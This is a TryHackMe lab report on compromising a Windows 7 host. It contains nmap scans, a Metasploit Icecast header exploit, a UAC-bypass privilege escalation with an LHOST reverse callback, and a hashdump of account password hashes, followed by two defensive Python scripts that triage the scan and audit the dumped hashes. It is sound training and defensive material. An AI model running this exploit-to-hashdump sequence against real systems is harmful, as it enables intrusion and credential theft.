Vulnerability Report – TryHackMe Lab
Exam 1
Task 1
No information required.
Task 2
Ports 3389 / 8000 detected open
┌──(root💀kali)-[/home/kali]
└─# nmap -T5 --script smb-vuln-ms17-010 10.10.6.210
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-19 16:00 EDT
Nmap scan report for 10.10.6.210
Host is up (0.13s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
8000/tcp open http-alt
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 8.02 seconds
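The two nmap runs above are read by eye in the report. As an added example (not part of the original report or of nmap), the following Python parses nmap's normal-format output, extracts the open ports and any host-script result that reports VULNERABLE together with its CVE ids, and turns them into a prioritised list of findings for the remediation owner. The sample text is constructed from the scan output shown above; the severity labels and the per-port advice are this example's own assumptions, not nmap output.

```python
import re

# Constructed sample: a trimmed copy of the nmap normal output shown in the report
SAMPLE_NMAP = """\
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-19 16:00 EDT
Nmap scan report for 10.10.6.210
Host is up (0.13s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
8000/tcp open http-alt
49152/tcp open unknown
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 8.02 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)")
# NSE script names are lowercase with hyphens ("| smb-vuln-ms17-010:"), which
# separates them from result keywords such as "| VULNERABLE:"
SCRIPT_RE = re.compile(r"^\|\s*([a-z][a-z0-9-]*):\s*$")
CVE_RE = re.compile(r"CVE-\d{4}-\d+")

# Assumed triage advice for services that deserve attention when reachable
EXPOSED_SERVICES = {
    445: "SMB reachable: restrict with host firewall and disable SMBv1",
    3389: "RDP reachable: require NLA, restrict source networks, enforce lockout/MFA",
    8000: "Unidentified HTTP service: confirm product and version, patch or decommission",
}


def parse_nmap(text):
    """Return host, open-port tuples and per-script state/CVE ids from nmap normal output."""
    host = None
    ports = []
    scripts = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m:
            ports.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
            continue
        m = SCRIPT_RE.match(line)
        if m:
            current = m.group(1)
            scripts[current] = {"state": None, "cves": []}
            continue
        if current and line.startswith("|"):
            body = line.lstrip("|_ ").strip()
            if body.startswith("State:"):
                scripts[current]["state"] = body.split(":", 1)[1].strip()
            for cve in CVE_RE.findall(body):
                if cve not in scripts[current]["cves"]:   # the reference URL repeats the id
                    scripts[current]["cves"].append(cve)
    return {"host": host, "ports": ports, "scripts": scripts}


def findings(report):
    """Rank what the scan revealed: confirmed vulnerabilities first, exposure second."""
    out = []
    open_ports = {p for p, _proto, state, _svc in report["ports"] if state == "open"}
    for port, advice in EXPOSED_SERVICES.items():
        if port in open_ports:
            out.append(("MEDIUM", f"{port}/tcp open: {advice}"))
    for name, info in report["scripts"].items():
        if info["state"] == "VULNERABLE":
            cves = ", ".join(info["cves"]) or "no CVE id"
            out.append(("CRITICAL", f"{name} reports VULNERABLE ({cves}): apply the vendor fix"))
    rank = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2}
    return sorted(out, key=lambda f: rank[f[0]])


if __name__ == "__main__":
    for severity, text in findings(parse_nmap(SAMPLE_NMAP)):
        print(f"[{severity}] {text}")
```

For a real engagement, feed it the file written by `nmap -oN`; the same regexes apply because the normal output format is what the report shows.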
Icecast detected
msf6 > search icecast
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header
Dark-PC (scanned machine)
┌──(root💀kali)-[/home/kali]
└─# nmap -T5 -sV 10.10.6.210
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-19 15:52 EDT
Nmap scan report for 10.10.6.210
Host is up (0.13s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Task 3
Vulnerability from 2004 found
msf6 > search icecast
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite
Metasploit module used
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header
Parameter changed: RHOSTS
msf6 exploit(windows/http/icecast_header) > set RHOSTS 10.10.6.210
RHOSTS => 10.10.6.210
Task 4
OS build / architecture
meterpreter > getuid
Server username: Dark-PC\Dark
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/Windows
Method used to escalate privileges
msf6 exploit(windows/http/icecast_header) > search post/multi/recon/local_
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(windows/http/icecast_header) > use 0
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.6.210 - Collecting local exploits for x86/windows...
[*] 10.10.6.210 - 40 exploit checks are being tried...
[+] 10.10.6.210 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
Second parameter changed: LHOST
msf6 exploit(windows/local/bypassuac_eventvwr) > set LHOST 10.6.15.228
LHOST => 10.6.15.228
Result of getprivs
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
Task 5
Service migrated to
meterpreter > ps
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
1368 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
Permission granted
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Machine passwords
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Dark:1000:aad3b435b51404eeaad3b435b51404ee:7c4fe5eada682714a036e39378362bab:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
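The hashdump lines above are in pwdump format (user:RID:LM hash:NT hash:::). As an added example (not part of the report or of Metasploit), the Python below audits such a dump from the defender's side: it flags accounts whose NT hash is the well-known hash of the empty string, accounts that still have an LM hash stored, and distinct accounts sharing the same non-empty NT hash (password reuse). The sample is constructed from the three lines shown above; the severity labels are this example's own assumptions.

```python
import re
from collections import defaultdict

# Well-known constants: the LM field shown when no LM hash is stored, and the
# NT hash (MD4 of UTF-16LE "") that an account with an empty password carries
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Constructed sample copied from the hashdump output in the report
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Dark:1000:aad3b435b51404eeaad3b435b51404ee:7c4fe5eada682714a036e39378362bab:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_pwdump(text):
    """Parse pwdump-format lines into dicts; lines that do not fit the format are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        user, rid, lm, nt = m.groups()
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return entries


def audit(entries):
    """Return (severity, user, issue) tuples for weak credential hygiene visible in the dump."""
    issues = []
    by_nt = defaultdict(list)
    for e in entries:
        if e["nt"] == EMPTY_NT:
            if e["rid"] == 500:          # built-in Administrator with no password
                sev = "HIGH"
            elif e["user"].lower() == "guest":
                sev = "LOW"              # normal for Guest, but verify it is disabled
            else:
                sev = "MEDIUM"
            issues.append((sev, e["user"], "empty password (NT hash of empty string)"))
        if e["lm"] != EMPTY_LM:
            issues.append(("HIGH", e["user"], "LM hash stored; disable LM hash storage"))
        if e["nt"] != EMPTY_NT:
            by_nt[e["nt"]].append(e["user"])
    for nt, users in by_nt.items():
        if len(users) > 1:
            issues.append(("MEDIUM", ", ".join(users), f"same NT hash {nt[:8]}...: password reuse"))
    return issues


if __name__ == "__main__":
    for sev, user, issue in audit(parse_pwdump(SAMPLE_DUMP)):
        print(f"[{sev}] {user}: {issue}")
```

Beyond the hygiene findings, the dump itself is the detection signal: reading the SAM requires SYSTEM (the report reached it by migrating into a SYSTEM process), so EDR rules for SAM registry hive access and process injection into system services are the controls that would have caught this step.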